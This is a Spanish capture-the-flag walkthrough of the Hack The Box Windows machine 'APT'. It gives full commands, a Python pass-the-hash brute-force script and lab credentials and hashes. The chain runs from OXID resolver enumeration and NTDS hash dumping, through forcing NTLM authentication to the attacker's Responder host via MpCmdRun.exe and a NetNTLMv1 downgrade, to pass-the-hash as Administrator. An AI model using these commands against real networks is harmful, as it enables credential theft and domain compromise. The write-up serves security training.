# APT

**OS**: Windows \
**Dificultad**: Insano \
**Puntos**: 50

## Resumen
- OXID Resolver
- Nmap ipv6
- Zip2john
- SecretsDump
- kerbrute
- Bruteforce PassTheHash
- HKEY_USERS (sección de registro HKU)
- Leaking NTLM hashes
- NetNTLMv1 Response
- Crack NetNTLMv1
- PassTheHash

## Nmap Scan

`nmap -sV -sC -p- -oN nmap.txt 10.10.10.213`

```
Nmap scan report for 10.10.10.213
Host is up (0.068s latency).
Not shown: 65533 filtered ports
PORT    STATE SERVICE VERSION
80/tcp  open  http    Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Gigantic Hosting | Home
135/tcp open  msrpc   Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
```

`nmap -6 -sV -sC -p- -oN nmap_ipv6.txt dead:beef::b885:d62a:d679:573f`

```
Nmap scan report for dead:beef::b885:d62a:d679:573f
Host is up (0.066s latency).
Not shown: 65512 filtered ports
PORT      STATE SERVICE      VERSION
53/tcp    open  domain       Simple DNS Plus
80/tcp    open  http         Microsoft IIS httpd 10.0
| http-server-header: 
|   Microsoft-HTTPAPI/2.0
|_  Microsoft-IIS/10.0
|_http-title: Bad Request
88/tcp    open  kerberos-sec Microsoft Windows Kerberos (server time: 2021-01-07 17:41:09Z)
135/tcp   open  msrpc        Microsoft Windows RPC
389/tcp   open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=apt.htb.local
| Subject Alternative Name: DNS:apt.htb.local
| Not valid before: 2020-09-24T07:07:18
|_Not valid after:  2050-09-24T07:17:18
|_ssl-date: 2021-01-07T17:42:19+00:00; +2m41s from scanner time.
445/tcp   open  microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: HTB)
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap     Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=apt.htb.local
| Subject Alternative Name: DNS:apt.htb.local
| Not valid before: 2020-09-24T07:07:18
|_Not valid after:  2050-09-24T07:17:18
|_ssl-date: 2021-01-07T17:42:19+00:00; +2m41s from scanner time.
3268/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=apt.htb.local
| Subject Alternative Name: DNS:apt.htb.local
| Not valid before: 2020-09-24T07:07:18
|_Not valid after:  2050-09-24T07:17:18
|_ssl-date: 2021-01-07T17:42:19+00:00; +2m41s from scanner time.
3269/tcp  open  ssl/ldap     Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=apt.htb.local
| Subject Alternative Name: DNS:apt.htb.local
| Not valid before: 2020-09-24T07:07:18
|_Not valid after:  2050-09-24T07:17:18
|_ssl-date: 2021-01-07T17:42:19+00:00; +2m41s from scanner time.
5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Bad Request
9389/tcp  open  mc-nmf       .NET Message Framing
47001/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Bad Request
Service Info: Host: APT; OS: Windows; CPE: cpe:/o:microsoft:windows
```

## Enumeración

Escaneando los puertos con IPv4 solo podemos ver dos puertos abiertos (**80, 135**). Al puerto 135 no podemos acceder y en el puerto 80 solo encontramos una página web de la cual no obtenemos nada importante.

### OXID Resolver

> OXID Resolver es un servicio que se ejecuta en todas las máquinas que admiten COM+. Realiza dos funciones importantes: \
    - Almacena los enlaces de cadenas RPC que son necesarios para conectarse con objetos remotos y los proporciona a los clientes locales. \
    - Envía mensajes de ping a objetos remotos para los que la máquina local tiene clientes y recibe mensajes de ping para objetos que se ejecutan en la máquina local. Este aspecto de OXID Resolver es compatible con el mecanismo de recolección de basura COM+.

Después de una investigación podemos utilizar [IOXIDResolver](https://github.com/mubix/IOXIDResolver) para enumerar interfaces de red adicionales y nos arroja dos direcciones IPv6.

> Para utilizar la herramienta es necesario instalar impacket con Python2: \
    - pip install --upgrade setuptools pip \
    - pip install .

`python /opt/IOXIDResolver/IOXIDResolver.py -t 10.10.10.213`

![1](img/1.png)

Realizando nuevamente un escaneo de puertos con la dirección IPv6 podemos ver nuevos puertos abiertos y un nombre de dominio **apt.htb.local**.

![2](img/2.png)

Agregaremos el nombre de dominó a nuestro archivo hosts.

##### /etc/hosts
```
dead:beef::b885:d62a:d679:573f  apt.htb.local htb.local
```

Ahora es posible acceder a los directorios compartidos y vemos uno interesante llamado **backup** que contiene un archivo **backup.zip** el cual descargamos a nuestra máquina.

- `smbclient -L apt.htb.local`
- `smbclient  //apt.htb.local/backup`

![3](img/3.png)

### Zip2john

Al intentar extraer los archivos dentro de **backup.zip** nos pide un password.

`unzip backup.zip`

![4](img/4.png)

Podemos hacer uso de la herramienta **zip2john** para obtener el hash del archivo, este hash contiene el password cifrado por lo cual posteriormente intentaremos descifrarlo con **john**.

- `zip2john backup.zip > backup_hash`
- `john backup_hash -wordlist=/usr/share/wordlists/rockyou.txt`

![5](img/5.png)

```
backup.zip : iloveyousomuch
```

Obtenemos el password y ahora podemos extraer los archivos.

- `unzip backup.zip`
- `ls -la Active\ Directory registry`

![6](img/6.png)

### SecretsDump

Con el archivo **SYSTEM** y **ntds.dit** podemos obtener los NTLM hashes de los usuarios utilizando la herramienta **secretsdump**.

`/opt/impacket/examples/secretsdump.py -system registry/SYSTEM -ntds Active\ Directory/ntds.dit LOCAL -just-dc-ntlm`

![7](img/7.png)

Guardaremos la lista de usuarios y hashes por separado.

- `cat hashes.txt | cut -d ':' -f 1 > users.txt`
- `cat hashes.txt | cut -d ':' -f 4 > users_hashes.txt`

![8](img/8.png)

### kerbrute

Utilizando la herramienta **kerbrute** podemos enumerar los usuarios existentes en el sistema y veremos que hay 3 usuarios.

`/opt/windows/kerbrute_linux_amd64 userenum -d htb.local --dc apt.htb.local users.txt`

![9](img/9.png)

### Bruteforce PassTheHash

Con el usuario **henry.vision** haremos un bruteforce de todos los hashes obtenidos para saber si alguno coincide. Para eso utilizaremos **getTGT.py** de impacket y automatizando el ataque con un simple script en Python.

> El script puede llegar a tardar de 5 a 10 min en terminar.

##### exploit.py
```python
import subprocess

hashes = open("users_hashes.txt")
lm = 'aad3b435b51404eeaad3b435b51404ee'
user = 'htb.local/henry.vinson'

for nt in hashes:
    nt = nt[:-1]
    command = '/opt/impacket/examples/getTGT.py -hashes ' + lm + ':' + nt + ' ' + user
    process = subprocess.Popen(command, stdout=subprocess.PIPE, universal_newlines=True, shell=True)
    output = process.stdout.readlines()
    
    if 'KDC_ERR_PREAUTH_FAILED' in output[2]:
        continue
    else:
        print(output[2])
        print(lm + ':' + nt)
        break
```

Vemos que uno de los hashes se autenticó correctamente.

`python3 exploit.py`

![10](img/10.png)

```
henry.vinson : aad3b435b51404eeaad3b435b51404ee:e53d87d42adaa3ca32bdb34a876cbffb
```

### HKEY_USERS (sección de registro HKU)

> HKEY_USERS, abreviado como HKU, contiene información de configuración específica del usuario para todos los usuarios actualmente activos en la computadora.

Revisando los registros con la herramienta **reg.py** de impacket logramos identificar un usuario y password en el registro **HKU\SOFTWARE\GiganticHostingManagementSystem**.

```
/opt/impacket/examples/reg.py -hashes aad3b435b51404eeaad3b435b51404ee:e53d87d42adaa3ca32bdb34a876cbffb -dc-ip apt.htb.local henry.vinson@apt.htb.local query -keyName HKU\\
```

![11](img/11.png)

```
/opt/impacket/examples/reg.py -hashes aad3b435b51404eeaad3b435b51404ee:e53d87d42adaa3ca32bdb34a876cbffb -dc-ip apt.htb.local henry.vinson@apt.htb.local query -keyName HKU\\SOFTWARE
```

![12](img/12.png)

```
/opt/impacket/examples/reg.py -hashes aad3b435b51404eeaad3b435b51404ee:e53d87d42adaa3ca32bdb34a876cbffb -dc-ip apt.htb.local henry.vinson@apt.htb.local query -keyName HKU\\SOFTWARE\\GiganticHostingManagementSystem
```

![13](img/13.png)

```
henry.vinson_adm : G1#Ny5@2dvht
```

Con las credenciales obtenidas nos podemos conectar a través de **winrm** con la herramienta **evil-winrm**.

`evil-winrm -i apt.htb.local -u 'henry.vinson_adm' -p 'G1#Ny5@2dvht'`

![14](img/14.png)

## Escalada de Privilegios

Subimos al sistema el programa **winPEAS.bat** para enumerar, ya que no lo detecta Windows Defender.

- `mkdir temp`
- `cd temp`
- `upload /opt/windows/winPEAS.bat`
- `cmd /c winPEAS.bat`

![15](img/15.png)

Encontramos un archivo interesante llamado **ConsoleHost_history.txt**, que contiene comandos en PowerShell.

![16](img/16.png)

`cat C:\Users\henry.vinson_adm\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt`

![17](img/17.png)

### Leaking NTLM hashes

Revisando el **scriptblock** que se ejecutó podemos ver que está modificando el registro **HKLM:\SYSTEM\CurrentControlSet\Control\Lsa**, específicamente el valor del parámetro **lmcompatibilitylevel** y le está asignando un valor de 2.

En esta [página](http://systemmanager.ru/win2k_regestry.en/76052.htm) nos explica que si el valor es establecido en 2, permite la autenticación a través de **NTLMv1** y **NTLMv2**.

Intentamos capturar el NTLM hash con la herramienta **responder**, utilizar técnicas comunes no funcionaran. Investigando llegamos a este [repositorio](https://github.com/Gl3bGl4z/All_NTLM_leak) donde podemos usar **MpCmdRun.exe** para hacer peticiones a nuestra IP y capturamos el **NTLMv2** hash del usuario **APT$**.

- `responder -I tun0`
- `.\MpCmdRun.exe -Scan -ScanType 3 -File \\10.10.14.165\doom`

![18](img/18.png)

### NetNTLMv1 Response

Ya que no fue posible crackear el hash NTLMv2, intentaremos obtener el hash **NTLMv1**. Para esto es necesario modificar el archivo **Responder.conf** y modificar el valor de la variable **Challenge = 1122334455667788**.

`nano /etc/responder/Responder.conf`

![19](img/19.png)

Una vez modificado el archivo ejecutamos nuevamente el responder, pero ahora agregando la opción **--lm** esto para forzar **LM hashing downgrade** y sea más rápido crackear el hash.

> Si al momento de modificar Responder.conf les arroja un error: \
        - AttributeError: 'str' object has no attribute 'decode' \
    Solo necesitamos modificar /usr/share/responder/./Responder.py y cambiar la linea 1 por python2: \
        - #! /usr/bin/env python3 \
        - #! /usr/bin/env python

Repetimos el proceso anterior y obtenemos el hash **NTLMv1** con el **Challenge** modificado.

- `responder -I tun0 --lm`
- `.\MpCmdRun.exe -Scan -ScanType 3 -File \\10.10.14.165\doom`

![20](img/20.png)

### Crack NetNTLMv1

Con la herramienta [ntlmv1-multi](https://github.com/evilmog/ntlmv1-multi) podemos obtener el hash para crackear con **crack.sh**.

```
python3 /opt/ntlmv1-multi/ntlmv1.py --ntlmv1 "APT$::HTB:95ACA8C7248774CB427E1AE5B8D5CE6830A49B5BB858D384:95ACA8C7248774CB427E1AE5B8D5CE6830A49B5BB858D384:1122334455667788"
```

![21](img/21.png)

Entramos a [crack.sh](https://crack.sh/get-cracking/) y llenamos los datos (utilizaremos un correo temporal).

![22](img/22.png)

Recibiremos un correo con el Token y la Key.

![23](img/23.png)

```
Token: $NETNTLM$1122334455667788$95ACA8C7248774CB427E1AE5B8D5CE6830A49B5BB858D384
Key: d167c3238864b12f5f82feae86a7f798
```

### PassTheHash

Utilizando **secretsdump** podemos obtener los hashes de los usuarios.

```
/opt/impacket/examples/secretsdump.py -hashes aad3b435b51404eeaad3b435b51404ee:d167c3238864b12f5f82feae86a7f798 "APT$"@apt.htb.local -just-dc-ntlm
```

![24](img/24.png)

Nos conectamos con el usuario Administrador pasándole el hash.

`evil-winrm -i apt.htb.local -u Administrator -H c370bddf384a691d811ff3495e8a72e2`

![25](img/25.png)

## Referencias
https://github.com/SecureAuthCorp/impacket \
https://github.com/mubix/IOXIDResolver \
https://github.com/ropnop/kerbrute \
https://es.wikipedia.org/wiki/Registro_de_Windows#HKEY_USERS_(HKU) \
https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS \
http://systemmanager.ru/win2k_regestry.en/76052.htm \
https://github.com/lgandx/Responder \
https://github.com/Gl3bGl4z/All_NTLM_leak \
https://github.com/evilmog/ntlmv1-multi \
https://github.com/NotMedic/NetNTLMtoSilverTicket/
https://crack.sh/get-cracking/